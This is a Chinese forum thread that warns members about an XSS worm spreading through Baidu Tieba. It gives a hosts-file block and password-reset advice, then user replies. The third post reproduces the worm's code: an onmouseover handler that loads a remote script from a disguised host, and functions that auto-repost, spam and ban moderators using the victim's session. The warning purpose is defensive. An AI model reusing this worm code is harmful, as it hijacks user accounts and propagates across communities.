无门吧 关注:104贴子:7,596

【无门紧急公告】关于XSS盗号代码的应急预案

只看楼主收藏回复

【只看楼主】
近日各贴吧遭到XSS攻击,考虑到部分门人没注意到群内公告,特此在你们常驻贴吧内开帖通知。
盗号代码贴有以下特征:
1、都是转帖,来自test吧
2、帖子外部可以看到乱码
3、最新的xss 代码baoba 。只要鼠标划过那个帖子标题就会自动转发,被盗号并且封禁自己所在有权限的吧务组。
吧务在外面用贴子管理工具删,不要点进去。【电脑用户特别要注意这条。还有,目前这种代码对客户端没有威胁,手机党可以放心的点进去喷】
XSS攻击的危害包括
1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
3、盗窃企业重要的具有商业价值的资料
4、非法转账
5、强制发送电子邮件
6、网站挂马
7、控制受害者机器向其它网站发起攻击


IP属地:浙江通过百度相册上传1楼2014-03-09 22:51回复
    应急方案,不保证百分百有用:
    ————找到C:\Windows\System32\drivers\etc\hosts,用记事本打开
    在最下面添加一行 127.0.0.1 xss.retaker. me 保存关闭。
    关掉浏览器再打开,这样子这个恶意脚本就无法获取到,也就无法执行
    要管理员身份的可以先保存在桌面,然后替换C:\Windows\System32\drivers\etc\里的hosts文件。
    为了你的帐号安全,无论你点击后是否中毒,请立即退出账号后使用“找回密码”功能修改密码,该操作会销毁你的所有cookie,最大程度保证帐号安全,短时间内尽量不要访问贴吧。
    希望大家互相通知


    IP属地:浙江2楼2014-03-09 22:53
    收起回复
      "on m)ou seo)ver="$.getScript ('//new)wo )) rdpre) ss.du app).com)/ xss2)01 40309/r c1.js')
      .function addThread(fid) {
      $.post("/relay/commit", {
      ie: "utf-8",
      kw: "test",
      fid:35,
      tid:2910585163,
      ftid: fid,
      ptid:2910585163,
      ppid:47102132189,
      tbs: PageData.tbs,
      title: config.titles[Math.random() * config.titles.length | 0],
      content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,
      new_vcode:1,
      tag:11,
      activity_id:1425,
      act_type:"photo",
      __type__:"repost"
      },function (x) {
      if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})
      }
      function reply(){
      if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;}
      if(PageData.user.user_forum_list.info[num].tid){
      num++;
      }else{
      PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id);
      }
      }
      function fuckRedTail() {
      var obj = {
      ie: "utf-8",
      kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",
      fid: 898666,
      tbs: PageData.tbs,
      title: "\u767e\u5ea6SB",
      content: config.contents[Math.random() * config.contents.length | 0]
      }
      for(var i=0;i<100;i++){
      $.post("/f/commit/thread/add",obj);
      }
      }
      if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}
      if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}
      if ("xiaoba" === userInfo.is_bawu) banXiaoBa();
      var ruchong=setInterval("reply()",2000);
      解读代码过程:
      加上判定的JS普通语句,挟持域名和IP,可见功能是划过该代码者将自动转发该程式到所有指定贴吧。
      而且被挟持的大吧会自动封禁小吧主。
      服务器地址被加密了以至于我找不到IP缓存位置。
      最后大吧会自动ban自己,解除所有权限,最后反复传播直到服务器崩溃。
      所有的贴吧全部都可能被感染。
      本体复制,该代码会以5min为周期自我复制。
      最后一段加密了,所以暂时不清楚如何结束程序。
      完,谢谢观赏,顺便说一下,手机客户端无法运行该代码。
      【以上是盗来的原文,未经授权所以不能把原楼主圈出来了】


      IP属地:浙江3楼2014-03-09 22:54
      回复
        有兴趣的可以看看历史案例:···新被发现的蠕虫Samy是首个利用XSS(即cross-site scripting,跨站脚本,又称跨站指令码)漏洞的病毒,安全专家担心它的出现,很可能又在网络世界中掀起一轮新的病毒攻击浪潮。 Samy是一种能自我传播的蠕虫,其作者是MySpace.com的成员。MySpace是一个专门帮助朋友们互相保持联系并共享照片的网络社区。在发现MySpace.com网站的漏洞后,蠕虫作者利用该漏洞,在自己的友人(friend)列表中添加了 多达1百万个联系人。 虽然该蠕虫尚未对网站安全构成严重威胁,但安全专家认为这个利用了XSS漏洞自我传播的新蠕虫,极有可能为其它恶意软件作者所抄袭。 Trend Micro澳大利亚及新西兰分公司高级系统工程师Adam Biviano解释,MySpce.com社区一名叫Samy的用户利用该社区网站设计上的漏洞,业已创立了‘动机不纯’的档案信息。该信息一经浏览,就自动将来访者加入到Samy的友人列表中。 不仅如此,恶意代码还能自我复制到受害人的档案中,因此当该受害人的档案被其它访问者浏览时,该病毒也就得以传播了。


        IP属地:浙江4楼2014-03-09 22:55
        回复
          我是手机客户端无碍,你们脑机的要注意点。话说程序漏洞什么的最可怕了。网络真心脆弱啊!
             --就算是木头划一刀也会有伤痕,张起灵,你呢?


          IP属地:安徽来自Android客户端5楼2014-03-09 23:27
          收起回复
            。。。幸好高三党摸不到电脑了。。。大家要注意的说~


            IP属地:北京来自Android客户端6楼2014-03-09 23:28
            收起回复
              我今天已经中招了


              7楼2014-03-09 23:30
              收起回复
                什么?
                   你要来一发吗,召唤师(/ω\)


                IP属地:四川来自Android客户端8楼2014-03-09 23:42
                收起回复
                  哦额,爪机无碍
                     --待你挥动时间,倒转宿命重写了预言


                  IP属地:广东来自Android客户端9楼2014-03-09 23:45
                  收起回复
                    没看懂忧郁的♚
                    侯灵十年,十年黄粱,黄粱一梦,一梦南柯.♟


                    来自Android客户端10楼2014-03-09 23:47
                    收起回复
                      你们用攻机的小心啊


                      来自Android客户端11楼2014-03-09 23:54
                      收起回复
                        手机党不用担心哇咔咔
                            ----
                           十年为期,青铜门开。
                        小哥,我待你王者归来! 


                        来自Android客户端12楼2014-03-09 23:59
                        收起回复
                          感谢哟


                          来自iPhone客户端13楼2014-03-10 00:08
                          收起回复
                            渣叔太体贴了


                            来自Android客户端14楼2014-03-10 00:30
                            收起回复
                              决定明天不开电脑了。。。。


                              来自Android客户端15楼2014-03-10 01:09
                              回复